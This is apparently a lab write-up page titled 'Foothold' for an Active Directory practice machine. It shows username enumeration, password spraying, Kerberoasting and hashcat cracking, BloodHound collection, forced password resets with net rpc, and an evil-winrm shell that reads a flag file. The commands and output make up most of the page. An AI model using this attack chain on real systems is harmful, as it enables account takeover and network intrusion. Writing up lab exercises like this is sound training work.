Foothold

nagoya-industries.com

Matthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.Lewis

Verify usernames

fiona.clark:Summer2023

svc_helpdesk
svc_mssql
svc_tpl
svc_web

❯ hashcat -m 13100 kereroast.hash ~/rockyou.txt -O --show
...
svc_mssql:Service1
...

svc_mssql:Service1

svc_web:Service1

❯ bloodhound-python -d nagoya-industries.com -u fiona.clark -p Summer2023 -ns 192.168.246.21 -c all
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: nagoya-industries.com
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (nagoya.nagoya-industries.com:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nagoya.nagoya-industries.com
INFO: Found 36 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: nagoya.nagoya-industries.com
INFO: Done in 00M 08S

GitHub - ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilitiesGitHub

❯ python targetedKerberoast.py -v -d nagoya-industries.com -u fiona.clark -p Summer2023

❯ hashcat -m 13100 targeted.hash ~/rockyou.txt -O

Couldnt crack anything. Change password instead

❯ net rpc password "Bethan.Webster" 'Pwned123!' -U nagoya-industries.com/fiona.clark%Summer2023 -S dc.nagoya-industries.com

❯ net rpc password "Christopher.Lewis" 'Pwned123!' -U nagoya-industries.com/Bethan.Webster%'Pwned123!' -S dc.nagoya-industries.com

❯ evil-winrm -i 192.168.246.21 -u Christopher.Lewis  -p Pwned123!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami ; type C:\local.txt ; ipconfig

nagoya-ind\christopher.lewis
fe51542372fe3fdfb29cae954902c311

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.246.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.246.254
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents>

Previous445 NextPriv Esc

Last updated 1 year ago